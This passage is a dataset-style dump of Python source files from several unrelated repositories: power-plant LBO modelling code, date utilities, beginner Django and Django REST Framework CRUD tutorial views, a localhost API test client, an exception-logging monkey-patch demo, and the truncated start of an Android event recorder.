        existing_record_df = dbLBO.get_powerplant(self.name, self.fuelType, self.market, self.node, self.powerHub, today_date)
        ready_to_kean_pp_df = pd.DataFrame()
        if existing_record_df is not None and len(existing_record_df) > 0:
            currecord_effective_start = existing_record_df.iloc[0].effective_start
            currecord_effective_end = existing_record_df.iloc[0].effective_end
            id_powerplant.append(str(existing_record_df.iloc[0].id_powerplant))
            if currecord_effective_start < today_date and currecord_effective_end >= today_date:
                effective_start = today_date
                # .at replaces DataFrame.set_value (removed in pandas 1.0);
                # both are label-based scalar setters.
                existing_record_df.at[0, 'effective_end'] = today_date - timedelta(1)
            if currecord_effective_start == today_date and currecord_effective_end >= today_date:
                # A record created today is simply superseded, not closed out.
                effective_start = today_date
                existing_record_df = existing_record_df.drop([0])
            ready_to_kean_pp_df = existing_record_df
        # self.technology may be a plain string or a Technology object.
        technology_name = self.technology if isinstance(self.technology, str) else self.technology.name
        added_record_to_kean_pp_df = pd.DataFrame(
            columns=['name',
                     'fuel_type',
                     'market',
                     'node',
                     'power_hub',
                     'technology',
                     'power_zone',
                     'power_hub_on_peak',
                     'power_hub_off_peak',
                     'fuel_zone',
                     'fuel_hub',
                     'summer_fuel_basis',
                     'winter_fuel_basis',
                     'summer_duct_capacity',
                     'summer_base_capacity',
                     'winter_duct_capacity',
                     'winter_base_capacity',
                     'first_plan_outage_start',
                     'first_plan_outage_end',
                     'second_plan_outage_start',
                     'second_plan_outage_end',
                     'carbon_cost',
                     'source_notes',
                     'retirement_date',
                     'ownership',
                     'effective_start',
                     'effective_end'],
            data=[[self.name,
                   self.fuelType,
                   self.market,
                   self.node,
                   self.powerHub,
                   technology_name,
                   self.powerZone,
                   self.powerHubOnPeak,
                   self.powerHubOffPeak,
                   self.fuelZone,
                   self.fuelHub,
                   self.summerFuelBasis,
                   self.winterFuelBasis,
                   self.summerDuctCapacity,
                   self.summerBaseCapacity,
                   self.winterDuctCapacity,
                   self.winterBaseCapacity,
                   self.firstPlanOutageStart,
                   self.firstPlanOutageEnd,
                   self.secondPlanOutageStart,
                   self.secondPlanOutageEnd,
                   self.carbonCost,
                   self.sourceNotes,
                   self.retirementDate,
                   self.ownership,
                   effective_start,
                   effective_end]])
        # pd.concat replaces DataFrame.append (removed in pandas 2.0).
        ready_to_kean_pp_df = pd.concat([ready_to_kean_pp_df, added_record_to_kean_pp_df], sort=False)
        dbLBO.put_powerplant(ready_to_kean_pp_df, id_powerplant)
class Holdco(Entity):
    """Holding-company entity; behavior beyond the base class is still TBD."""

    def __init__(self, name):
        # Every holdco carries the fixed type tag 'holdco'.
        super().__init__(name, 'holdco')
class Technology():
    """Operating characteristics shared by plants of one generation technology:
    seasonal heat rates (base/duct/low-operating-limit), per-start costs,
    emissions rate, variable O&M and an outage factor. All numeric inputs
    default to 0.0."""

    def __init__(self, name,
                 summer_duct_heatrate=0.0,
                 summer_base_heatrate=0.0,
                 winter_duct_heatrate=0.0,
                 winter_base_heatrate=0.0,
                 lol_capacity=0.0,
                 lol_summer_heatrate=0.0,
                 lol_winter_heatrate=0.0,
                 start_expense=0.0,
                 start_fuel=0.0,
                 start_hours=0.0,
                 emissions_rate=0.0,
                 vom=0.0,
                 uof=0.0):
        self.name = name
        # Seasonal heat rates: duct firing vs. base load.
        (self.summerDuctHeatrate, self.summerBaseHeatrate,
         self.winterDuctHeatrate, self.winterBaseHeatrate) = (
            summer_duct_heatrate, summer_base_heatrate,
            winter_duct_heatrate, winter_base_heatrate)
        # Low-operating-limit characteristics.
        (self.lolCapacity, self.lolSummerHeatrate, self.lolWinterHeatrate) = (
            lol_capacity, lol_summer_heatrate, lol_winter_heatrate)
        # Per-start cost, fuel burn and duration.
        self.startExpense, self.startFuel, self.startHours = (
            start_expense, start_fuel, start_hours)
        self.emissionsRate = emissions_rate
        self.vom = vom  # variable O&M
        self.uof = uof  # presumably unplanned outage factor -- TODO confirm
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,757 | changliukean/KEAN3 | refs/heads/master | /utility/dateUtils.py | from datetime import datetime, date, timedelta
from calendar import monthrange
from dateutil.parser import parse
from dateutil.relativedelta import relativedelta
# store nerc holidays in kean3
# store dst dates in kean3
def get_one_month_ago(date_obj):
    """Return the last day of the month preceding *date_obj*'s month."""
    first_of_month = date(date_obj.year, date_obj.month, 1)
    # One day before the 1st is always the previous month's last day.
    return first_of_month - timedelta(days=1)
def get_month_list(start_month, end_month):
    """Return the month-end date of every month from *start_month*'s month
    through *end_month*'s month, inclusive (empty if start is after end)."""
    cursor = date(start_month.year, start_month.month, 1)
    final_day = date(end_month.year, end_month.month,
                     monthrange(end_month.year, end_month.month)[1])
    month_ends = []
    while cursor <= final_day:
        month_end = date(cursor.year, cursor.month,
                         monthrange(cursor.year, cursor.month)[1])
        month_ends.append(month_end)
        # Jump to the first day of the next month.
        cursor = month_end + timedelta(days=1)
    return month_ends
def get_one_month_later(date_obj):
    """Return the last day of the month following *date_obj*'s month."""
    days_this_month = monthrange(date_obj.year, date_obj.month)[1]
    # Day after this month's last day is the 1st of the next month.
    next_month_start = date(date_obj.year, date_obj.month, days_this_month) + timedelta(days=1)
    return date(next_month_start.year, next_month_start.month,
                monthrange(next_month_start.year, next_month_start.month)[1])
def get_date_obj_from_str(date_str):
    """Parse a free-form date string (via dateutil) into a datetime.date."""
    parsed = parse(date_str)
    return parsed.date()
def get_months_shift_date(anchor_date, number_of_months):
    """Shift *anchor_date* by whole calendar months (negative shifts back)."""
    shift = relativedelta(months=number_of_months)
    return anchor_date + shift
def get_cash_balance_begin_date(as_of_date):
    """Return the month-end of the month containing the day after *as_of_date*
    (so a month-end input rolls into the following month)."""
    next_day = as_of_date + timedelta(days=1)
    return date(next_day.year, next_day.month,
                monthrange(next_day.year, next_day.month)[1])
def get_year_month_header(period_month):
    """Format a date as a 'YYYY-Mon' column header (e.g. '2021-May').

    Uses a fixed English abbreviation table rather than strftime so the
    output is locale-independent.
    """
    abbrevs = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
               'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')
    return "{}-{}".format(period_month.year, abbrevs[period_month.month - 1])
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,793 | csourabh8824/djangohomerestframework | refs/heads/master | /generic_apiview/school/views.py | from django.shortcuts import render
from .models import Student
from .serializers import StudentSerializer
from rest_framework.generics import GenericAPIView
from rest_framework.mixins import ListModelMixin, CreateModelMixin, RetrieveModelMixin, UpdateModelMixin, DestroyModelMixin
# Create your views here.
# Mixins in GenericApi views:
# 1) ListModelMixin: Provides a .list(request, *args, **kwargs) method, that implements listing a queryset.
# 2) CreateModelMixin :Provides a .create(request, *args, **kwargs) method, that implements creating and saving a new model instance.
# 3) RetrieveModelMixin:Provides a .retrieve(request, *args, **kwargs) method, that implements returning an existing model instance in a response.
# 4) UpdateModelMixin: Provides a .update(request, *args, **kwargs) method, that implements updating and saving an existing model instance.
# 5) DestroyModelMixin: Provides a .destroy(request, *args, **kwargs) method, that implements deletion of an existing model instance.
class StudentList(GenericAPIView, ListModelMixin):
    """GET endpoint that returns every Student, serialized as a list."""

    # DRF's generic machinery looks up these two attribute names verbatim.
    queryset = Student.objects.all()
    serializer_class = StudentSerializer

    def get(self, request, *args, **kwargs):
        # ListModelMixin.list() serializes (and paginates) the queryset.
        return self.list(request, *args, **kwargs)
class StudentCreate(GenericAPIView, CreateModelMixin):
    """POST endpoint that validates and saves a new Student."""

    queryset = Student.objects.all()
    serializer_class = StudentSerializer

    def post(self, request, *args, **kwargs):
        # CreateModelMixin.create() validates, saves and returns 201.
        return self.create(request, *args, **kwargs)
class StudentRetrieve(GenericAPIView, RetrieveModelMixin):
    """GET endpoint that returns a single Student looked up by URL pk."""

    queryset = Student.objects.all()
    serializer_class = StudentSerializer

    def get(self, request, *args, **kwargs):
        # RetrieveModelMixin.retrieve() fetches one object and serializes it.
        return self.retrieve(request, *args, **kwargs)
class StudentUpdate(GenericAPIView, UpdateModelMixin):
    """PUT endpoint that fully replaces one Student record."""

    queryset = Student.objects.all()
    serializer_class = StudentSerializer

    def put(self, request, *args, **kwargs):
        # UpdateModelMixin.update() validates the payload and saves it.
        return self.update(request, *args, **kwargs)
class StudentDelete(GenericAPIView, DestroyModelMixin):
    """DELETE endpoint that removes one Student record."""

    queryset = Student.objects.all()
    serializer_class = StudentSerializer

    def delete(self, request, *args, **kwargs):
        # DestroyModelMixin.destroy() deletes the object and returns 204.
        return self.destroy(request, *args, **kwargs)
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,794 | csourabh8824/djangohomerestframework | refs/heads/master | /crud3/student/views.py | from django.shortcuts import render
from django.views.generic import CreateView, ListView, UpdateView, DeleteView
from .forms import RegistrationForm
from .models import Student
# Create your viewsfrom .models import Student here.
class StudentCreateView(CreateView):
    """Registration page: renders RegistrationForm and, alongside it,
    the full roster of existing students."""

    form_class = RegistrationForm
    template_name = "student/home.html"
    success_url = "/thanks/"

    def get_context_data(self, **kwargs):
        # Augment the default context so the template can also list everyone.
        context = super().get_context_data(**kwargs)
        context["student"] = Student.objects.all()
        return context
class StudentUpdateView(UpdateView):
    # Generic edit view: model form over one Student (name/email only),
    # redirecting to /thanks/ on success.
    model = Student
    fields = ["name", "email"]
    template_name = "student/update.html"
    success_url = "/thanks/"
class StudentDeleteView(DeleteView):
    # Generic delete view: confirmation page for one Student, then /thanks/.
    model = Student
    template_name = "student/delete.html"
    success_url = "/thanks/"
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,795 | csourabh8824/djangohomerestframework | refs/heads/master | /viewset/school/views.py | from django.shortcuts import render
from .models import Student
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework import status
from .serializers import StudentSerializer
# Create your views here.
"""
ViewSet class is a class based view that does not provide any method handlers like get(),post(),put() etc
instead of the method handlers it provides actions such as list(),create,retrieve(),update() etc.
"""
"""
Actions:
list(): Give all records.
create(): Creates a record.
update(): updates record completely.
partial_update(): updates record partially.
retrieve(): give single record.
destroy(): deletes an existing record
"""
"""
Attributes in viewset:
basename: This is a name defined on URL dispatcher.
action: the name of current action example list(),create()etc
detail,suffix,name,description
"""
"""
viewset url config(urls.py):
from django.urls import path,include
from rest_framework.routers import DefaultRouter
router = DefaultRouter() #creating default router object
router.register("studentapi",views)
urlpatterns = [
path("",include(router.urls)),
]
"""
class StudentViewSet(viewsets.ViewSet):
    """Explicit-action CRUD ViewSet for Student, wired up by a DRF Router
    (list/create/retrieve/update/partial_update/destroy).

    Fix: failure branches previously returned ``status.HTTP_200_BAD_REQUEST``,
    which does not exist in rest_framework.status — every validation failure
    raised AttributeError instead of answering the client. They now return
    ``HTTP_400_BAD_REQUEST``.
    """

    def list(self, request):
        """GET collection: return every Student."""
        serializer = StudentSerializer(Student.objects.all(), many=True)
        return Response(serializer.data)

    def create(self, request):
        """POST: validate and save a new Student."""
        serializer = StudentSerializer(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response({"msg": "data created"}, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def update(self, request, pk=None):
        """PUT: full replacement of the record identified by pk."""
        stu = Student.objects.get(pk=pk)
        serializer = StudentSerializer(stu, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response({"msg": "Complete data updated"}, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def partial_update(self, request, pk=None):
        """PATCH: update only the fields supplied in the payload."""
        stu = Student.objects.get(pk=pk)
        serializer = StudentSerializer(stu, data=request.data, partial=True)
        if serializer.is_valid():
            serializer.save()
            return Response({"msg": "Partial data updated"}, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def retrieve(self, request, pk=None):
        """GET detail: return the record identified by pk."""
        serializer = StudentSerializer(Student.objects.get(pk=pk))
        return Response(serializer.data)

    def destroy(self, request, pk=None):
        """DELETE: remove the record identified by pk."""
        Student.objects.get(pk=pk).delete()
        return Response({"msg": "data deleted"})
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,796 | csourabh8824/djangohomerestframework | refs/heads/master | /crud1/school/forms.py | from django import forms
from .models import Student
class RegisterForm(forms.ModelForm):
    # ModelForm over Student exposing every model field.
    # Override the auto-generated field so the browser masks the password.
    password = forms.CharField(max_length=60, widget=forms.PasswordInput)
    class Meta:
        model = Student
        fields = '__all__'
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,797 | csourabh8824/djangohomerestframework | refs/heads/master | /crud3/student/forms.py | from django import forms
from .models import Student
# If you are using model name in createview then use this
# class RegistrationForm(forms.Form):
# name = forms.CharField(max_length=20)
# email = forms.EmailField()
# If you are using form class in createview then use this
class RegistrationForm(forms.ModelForm):
    # ModelForm over Student limited to name and email, used by the
    # class-based CreateView/UpdateView in this app.
    class Meta:
        model = Student
        fields = ["name", "email"]
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,798 | csourabh8824/djangohomerestframework | refs/heads/master | /crud1/school/views.py | from django.shortcuts import render, redirect, HttpResponse
from .forms import RegisterForm
from .models import Student
# Create your views here.
def home(request):
    """Render the roster page with every registered Student."""
    roster = Student.objects.all()
    # Template expects the queryset under the 'students' key.
    return render(request, "school/home.html", context={"students": roster})
def add_student(request):
    """Registration form: save a Student on valid POST, otherwise render
    the form (unbound on GET, bound with errors on invalid POST)."""
    if request.method != "POST":
        # Fresh page load: show an empty form.
        return render(request, "school/register.html",
                      context={"form": RegisterForm()})
    form = RegisterForm(request.POST)
    if not form.is_valid():
        # Re-render with the bound form so field errors are shown.
        return render(request, "school/register.html", context={"form": form})
    cleaned = form.cleaned_data
    Student(name=cleaned['name'], email=cleaned['email'],
            password=cleaned['password']).save()
    return redirect('home')
def update_student(request, id):
    """Edit the Student identified by primary key *id*.

    GET renders the pre-filled form; valid POST saves and redirects home;
    invalid POST re-renders the bound form with errors.
    """
    record = Student.objects.get(pk=id)
    if request.method == "POST":
        form = RegisterForm(request.POST, instance=record)
        if form.is_valid():
            form.save()
            return redirect("home")
    else:
        form = RegisterForm(instance=record)
    return render(request, "school/update.html", context={"form": form})
def delete_data(request, id):
    """Delete the Student with primary key *id* and confirm with bare HTML."""
    Student.objects.get(pk=id).delete()
    return HttpResponse("<h1>DATA DELETED</h1>")
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,799 | csourabh8824/djangohomerestframework | refs/heads/master | /crud4/thirdparty.py | import requests
import json
# Smoke-test client for the local student API. NOTE(review): the endpoint is
# hard-coded to record 2 even though ids are also sent in the request body.
URL = "http://127.0.0.1:8000/studentapi/2/"


def show_data(id=None):
    """GET the record whose id is carried in the JSON body; print the reply."""
    payload = json.dumps({"id": id})
    reply = requests.get(url=URL, data=payload)
    print(reply.json())


show_data(2)
def create_data():
    """POST a hard-coded roll/name pair and print the server's JSON reply."""
    payload = json.dumps({"roll": 102, "name": "Yashraj"})
    reply = requests.post(url=URL, data=payload)
    print(reply.json())


# create_data()
def update_data():
    """PUT a full replacement for record id 2 and print the JSON reply."""
    payload = json.dumps({'id': 2, "roll": 103, "name": "raj"})
    reply = requests.put(url=URL, data=payload)
    print(reply.json())


# update_data()
def delete_data():
    """DELETE record id 1 (id sent in the body) and print the JSON reply."""
    payload = json.dumps({'id': 1})
    reply = requests.delete(url=URL, data=payload)
    print(reply.json())


# delete_data()
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,800 | csourabh8824/djangohomerestframework | refs/heads/master | /fbv_apiview/student/views.py | from django.shortcuts import render
from rest_framework.decorators import api_view
from rest_framework.response import Response
from .models import Student
from .serializers import StudentSerializer
from rest_framework import status
# Create your views here.
# request.data contains all the data i.e id,name,roll,city It has a data parsed in python
# We don't have to use JSONParser() to convert in python
# Response(data, status=None, template_name=None, headers=None, content_type=None)
# data: The serialized data for the response.(python data)
# status: A status code for the response. Defaults to 200. See also status codes.
# template_name: A template name to use if HTMLRenderer is selected.
# headers: A dictionary of HTTP headers to use in the response.
# content_type: The content type of the response. Typically, this will be set automatically by the renderer as determined by content negotiation, but there may be some cases where you need to specify the content type explicitly.
@api_view(["GET", "POST", "PUT", "PATCH", "DELETE"])
def student_api(request, pk=None):
if request.method == "GET":
id = pk
if id is not None:
stu = Student.objects.get(pk=id)
serializer = StudentSerializer(stu)
return Response(serializer.data)
stu = Student.objects.all()
serializer = StudentSerializer(stu, many=True)
return Response(serializer.data)
if request.method == "POST":
python_data = request.data
serializer = StudentSerializer(data=python_data)
if serializer.is_valid():
serializer.save()
return Response({"msg": "Data Created"}, status=status.HTTP_201_CREATED)
return Response(serializer.errors)
if request.method == "PUT":
id = pk
stu = Student.objects.get(pk=id)
serializer = StudentSerializer(stu, data=request.data)
if serializer.is_valid():
serializer.save()
return Response({"msg": "data updated"}, status=status.HTTP_201_CREATED)
return Response(serializer.errors)
if request.method == "PATCH":
id = pk
stu = Student.objects.get(pk=id)
serializer = StudentSerializer(stu, data=request.data, partial=True)
if serializer.is_valid():
serializer.save()
return Response({"msg": "Data Updated Partially"})
return Response(serializer.errors)
if request.method == "DELETE":
id = request.data.get("id")
stu = Student.objects.get(pk=id)
stu.delete()
return Response({"msg": "Data Deleted"})
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,801 | csourabh8824/djangohomerestframework | refs/heads/master | /django-master/product/urls.py | from django.urls import path
from .views import ProductView
urlpatterns = [
    # Named 'product-add' so views/templates can reverse() it (the view
    # itself redirects back here after a successful save).
    path('add/', ProductView.as_view(), name='product-add'),
]
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,802 | csourabh8824/djangohomerestframework | refs/heads/master | /crud4/school/views.py | import io
from django.shortcuts import render
from django.http import HttpResponse
from rest_framework.parsers import JSONParser
from rest_framework.renderers import JSONRenderer
from .serializers import StudentSerializer
from django.views.decorators.csrf import csrf_exempt
from .models import Student
# Create your views here.
@csrf_exempt
def student_api(request, id):
    """Hand-rolled JSON CRUD endpoint for Student (no DRF views).

    Every verb reads its parameters — including the record id — from the
    JSON request body; the URL *id* argument is not used directly.
    """

    def parse_body():
        # Deserialize the raw request body into native Python data.
        return JSONParser().parse(io.BytesIO(request.body))

    def json_response(payload):
        # Serialize *payload* and wrap it in an application/json response.
        return HttpResponse(JSONRenderer().render(payload),
                            content_type='application/json')

    if request.method == "GET":
        body = parse_body()
        target_id = body.get("id", None)
        if target_id is not None:
            serializer = StudentSerializer(Student.objects.get(id=target_id))
        else:
            serializer = StudentSerializer(Student.objects.all(), many=True)
        return json_response(serializer.data)

    if request.method == "POST":
        serializer = StudentSerializer(data=parse_body())
        if serializer.is_valid():
            serializer.save()
            return json_response({"msg": "Data Created!"})
        return json_response(serializer.errors)

    if request.method == "PUT":
        body = parse_body()
        target = Student.objects.get(id=body.get('id'))
        serializer = StudentSerializer(target, data=body)
        if serializer.is_valid():
            serializer.save()
            return json_response({"msg": "Data Updated!!"})
        return json_response(serializer.errors)

    if request.method == "DELETE":
        body = parse_body()
        Student.objects.get(id=body.get("id")).delete()
        return json_response({"msg": "Data Deleted!!"})
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,803 | csourabh8824/djangohomerestframework | refs/heads/master | /django-master/product/views.py | from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.views import View
from django.urls import reverse
from .forms import ProductForm
class ProductView(View):
    """Render and process the product creation form.

    GET shows a blank form; POST validates and saves the submitted product,
    then redirects back to the add page (POST-redirect-GET pattern).
    """

    form_class = ProductForm
    template_name = 'product_template.html'

    def get(self, request, *args, **kwargs):
        # Initial page load: unbound form, no data.
        return render(request, self.template_name, {'form': self.form_class()})

    def post(self, request, *args, **kwargs):
        bound_form = self.form_class(request.POST)
        if not bound_form.is_valid():
            # Re-display the page with validation errors attached.
            return render(request, self.template_name, {'form': bound_form})
        bound_form.save()
        return HttpResponseRedirect(reverse('product-add'))
50,804 | csourabh8824/djangohomerestframework | refs/heads/master | /django-master/product/models.py | from django.db import models
class Product(models.Model):
    """Catalog entry consisting of a short title and a free-text summary."""
    # Display name of the product.
    title = models.CharField(max_length=200)
    # Longer description; help_text is shown in model forms and the admin.
    summary = models.TextField(max_length=1000, help_text='Enter a brief description of the Product')
50,805 | csourabh8824/djangohomerestframework | refs/heads/master | /crud2/school/views.py | from django.shortcuts import render, HttpResponse
from django.views import View
from django.views.generic import UpdateView, DeleteView
from .forms import RegistrationForm
from .models import Student
# Create your views here.
class Myview(View):
    """Combined list/create/delete view for Student records.

    GET renders the registration form together with every existing student;
    POST validates the form and persists a new Student; DELETE removes the
    student with the given primary key.
    """

    def get(self, request, *args, **kwargs):
        """Render the registration form alongside the current student list."""
        form = RegistrationForm()
        students = Student.objects.all()
        return render(request, "school/home.html", context={"form": form, "students": students})

    def post(self, request, *args, **kwargs):
        """Create a Student from the submitted form data."""
        form = RegistrationForm(request.POST)
        if form.is_valid():
            name = form.cleaned_data.get('name')
            email = form.cleaned_data.get('email')
            student_data = Student(name=name, email=email)
            student_data.save()
            return HttpResponse("<h1>Posted</h1>")
        # Bug fix: the invalid-form re-render previously omitted "students",
        # so the listing the template shows on GET disappeared after a
        # failed submit. Supply the same context keys as get().
        students = Student.objects.all()
        return render(request, "school/home.html", context={"form": form, "students": students})

    def delete(self, request, id, *args, **kwargs):
        """Delete the Student with primary key ``id``.

        NOTE(review): an unknown id raises Student.DoesNotExist (HTTP 500);
        switching to get_object_or_404 would need an extra import — confirm
        the desired behavior before changing it.
        """
        student_data = Student.objects.get(pk=id)
        student_data.delete()
        return HttpResponse("<h1>Deleted!!</h1>")
class StudentUpdateView(UpdateView):
    """Generic edit view: loads a Student by pk from the URL, renders a
    name/email form, and redirects to /thanks/ on success."""
    model = Student
    fields = ["name", "email"]
    success_url = '/thanks/'
    template_name = "school/update.html"
class StudentDeleteView(DeleteView):
    """Generic delete view for Student; redirects to /thanks/ after deletion.

    NOTE(review): DeleteView normally renders a *confirmation* template, but
    this reuses "school/home.html" — confirm that is intentional.
    """
    model = Student
    success_url = '/thanks/'
    template_name = "school/home.html"
| {"/crud3/student/views.py": ["/crud3/student/forms.py"], "/crud1/school/views.py": ["/crud1/school/forms.py"], "/django-master/product/urls.py": ["/django-master/product/views.py"]} |
50,817 | alingse/exception-collector | refs/heads/master | /local.py |
class LocalError(Exception):
    """Demo exception carrying an explicit ``message`` attribute."""

    def __init__(self, message):
        # Fix: call the base initializer so ``args`` / ``str(exc)`` are
        # populated through the documented path instead of relying on the
        # side effect of BaseException.__new__ storing the constructor args.
        super().__init__(message)
        self.message = message
def runA():
    """Deliberately raise the module's custom error for the demo collector."""
    error = LocalError('hello')
    raise error
def runB():
    """Deliberately divide by zero so callers observe a ZeroDivisionError."""
    numerator, denominator = 1, 0
    return numerator / denominator
def run():
    """Trigger both demo failures in order, swallowing every exception.

    The swallowing is intentional: the companion demo script records the
    constructed exceptions elsewhere and only needs them to be raised.
    """
    for trigger in (runA, runB):
        try:
            trigger()
        except Exception:
            pass
| {"/demo.py": ["/local.py"]} |
50,818 | alingse/exception-collector | refs/heads/master | /demo.py | import builtins
from collections import defaultdict
# Global registry: exception class -> list of (instance, (args, kwargs), stack)
# records appended by the instrumented __init__ wrappers below.
collector = defaultdict(list)
# Keep a handle on the unpatched builtin Exception so code in this module can
# still catch everything after builtins.Exception is replaced further down.
OldException = builtins.Exception
class NewException(OldException):
    """Drop-in replacement for the builtin Exception that records every
    construction of any subclass into the module-level ``collector``.

    The instrumentation happens lazily: the first time a subclass is
    instantiated, its ``__init__`` is swapped for a wrapper that logs the
    instance, the constructor arguments, and the call stack.
    """

    def __init__(self, *args, **kwargs):
        # Debug trace for direct NewException construction.
        print(args, kwargs)
        super().__init__(*args, **kwargs)

    def __new__(cls, *args, **kwargs):
        # Wrap this subclass's __init__ exactly once; the 'collect' marker
        # attribute prevents double-wrapping on later instantiations.
        if not getattr(cls.__init__, 'collect', None):
            old_init = cls.__init__

            def __init__(i, *args, **kwargs):
                # Imported here so the module stays importable even if the
                # wrapper is never triggered.
                import inspect
                # Capture the full call stack at construction time; note this
                # is expensive and keeps frame references alive in collector.
                s = inspect.stack()
                collector[cls].append((i, (args, kwargs), s))
                old_init(i, *args, **kwargs)

            __init__.collect = True
            cls.__init__ = __init__
        return super().__new__(cls, *args, **kwargs)
# Monkey-patch: from this point on, any class statement that inherits from
# the builtin Exception actually inherits the instrumented NewException.
builtins.Exception = NewException
# TODO: replace every builtin exception type (ValueError, KeyError, ...) the same way
#---------------------------------#
# Import AFTER the patch so local.LocalError subclasses NewException.
from local import run
try:
    run()
except OldException:
    # Catch via the saved original class, which is still a base of everything.
    pass
print(collector)
| {"/demo.py": ["/local.py"]} |
50,828 | ArtyZiff35/Android-Application-State-Graph-Model-Parser | refs/heads/master | /eventRecorder.py | from com.dtmilano.android.viewclient import ViewClient, View, ViewClientOptions
from com.dtmilano.android.adb import adbclient
from com.dtmilano.android.common import debugArgsToDict
import subprocess
from subprocess import check_output
import psutil
import os
import time
import sys
import pyautogui
# Method to kill a process
def kill(proc_pid):
    """Terminate the process with PID ``proc_pid`` and all of its children.

    Children are killed first (recursively) so the parent cannot respawn or
    orphan them; finally the parent itself is killed.
    """
    parent = psutil.Process(proc_pid)
    for child in parent.children(recursive=True):
